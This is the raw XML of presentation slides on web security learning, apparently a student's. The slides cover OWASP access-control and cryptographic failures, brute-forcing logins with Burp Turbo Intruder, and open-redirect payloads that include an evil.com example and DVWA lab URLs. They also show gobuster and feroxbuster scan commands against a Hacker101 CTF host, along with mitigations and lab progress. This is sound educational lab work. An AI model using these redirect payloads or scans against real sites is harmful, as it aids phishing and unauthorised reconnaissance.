            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p19"/>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Except for public resources, deny by default.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Implement access control mechanisms once and re-use them throughout the application, including minimizing Cross-Origin Resource Sharing (CORS) usage.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Model access controls should enforce record ownership rather than accepting that the user can create, read, update, or delete any record.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Unique application business limit requirements should be enforced by domain models.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Disable web server directory listing and ensure file metadata (e.g., .git) and backup files are not present within web roots.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Log access control failures, alert admins when appropriate (e.g., repeated failures).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Rate limit API and controller access to minimize the harm from automated attack tooling.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Stateful session identifiers should be invalidated on the server after logout. Stateless JWT tokens should rather be short-lived so that the window of opportunity for an attacker is minimized. For longer lived JWTs it's highly recommended to follow the OAuth standards to revoke access.</a:t>
            </a:r>
            <a:endParaRPr sz="6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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3327900" cy="11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t>Burp Suite Turbo Intruder Extension</a:t>
            </a:r>
            <a:endParaRPr b="1"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rPr lang="en" sz="2520"/>
              <a:t>A tool I used to find usernames and passwords via a dictionary attack.</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rPr lang="en" sz="2520"/>
              <a:t>Using the word lists from SecLists.</a:t>
            </a:r>
            <a:endParaRPr sz="2520"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887993" y="0"/>
            <a:ext cx="5256014" cy="5143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id="531" name="Google Shape;531;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109053" y="0"/>
            <a:ext cx="5034944" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81500" y="371200"/>
            <a:ext cx="388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When the error code isn’t displayed the result is logged.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="533" name="Google Shape;533;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1208142"/>
            <a:ext cx="4109051" cy="393535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brute force	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;p8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 have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>separate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> error messages for username and password. Keep the error messages the same so usernames aren’t enumerated. Eg, “Username or password is incorrect”. This removes user enumeration.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Limit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> of login attempts a user can do.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rate limit the number of logins from an address.</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Open HTTP Redirect</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p8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redirects are when an application redirects a user to a URL supplied by an untrusted source. The user will visit the site but the site will redirect the user to a different site which could be malicious. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open redirects are often used in phishing attacks where the user is tricked into clicking the link which will take them to the trusted site but then redirect them to the malicious site. Payload example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>www.facebook.com?_g=DernKFjelgnne&amp;vid=iguana-party&amp;referrer=email&amp;next=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>http%3A%2F%2Fwww.evil.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Email providers often blacklist malicious sites to remove malicious emails.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HTTP Redirect Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;p8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http://localhost/DVWA/vulnerabilities/open_redirect/source/low.php?redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>//google.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>http://localhost/DVWA/vulnerabilities/open_redirect/source/medium.php?redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>//google.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>http://localhost/DVWA/vulnerabilities/open_redirect/source/high.php?redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>https://google.com/?a=info.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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Mitigations for open HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p8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accepting a page or a url as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> target, use ID values to tell the redirect page where to redirect to. This ensures the system only redirects to pages it knows and the attacker can not modify the URL to redirect to page that they choose.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="12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Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Google Shape;563;p8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OWASP Zap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Burp Suite Inspector, Repeater, Turbo Intruder, Decoder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Feroxbuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gobuster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Feroxbuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p8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fast, simple, recursive content discovery tool.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to map the pages I can find. Can also use to find hidden pages like gobuster.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feroxbuster -u https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/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Gobuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;p9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Directory/file &amp; DNS busting tool written in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to find hidden directories using a word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gobuster dir -u "https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/" -w /opt/SecLists/Discovery/Web-Content/common.txt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DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p9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application helped me learn many different vulnerabilities quickly with code examples.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL Injection Blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weak Session IDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS (DOM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS (Reflected)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS (Stored)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSP ByPass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open HTTP Redirect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a:t>Cryptographic Failures</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16" name="Google Shape;116;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="49485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Cryptographic failures is where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> are failures in encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many web APIs do not protect sensitive data with strong encryption which leads to theft and modification of weakly protected data which can lead to credit card fraud, identity theft, or other cyber crimes. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sensitive data must be encrypted at rest and in transit and must use newer cryptographic algorithms as they make encryption harder to crack. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unencrypted Communication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439525" y="1632863"/>
            <a:ext cx="3588301" cy="2455630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8832300" y="0"/>
            <a:ext cx="31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2</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk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Hacker101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p9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Worked through Hacker101 after DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. This was handy for finding good vulnerabilities that I could use for my reports.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Progress:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trivial - A little something to get you started</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1 / 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Micro-CMS v1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> / 4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Moderate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Micro-CMS v2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>3 / 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Moderate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Photo Gallery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>3 / 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Postbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>7 / 7</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
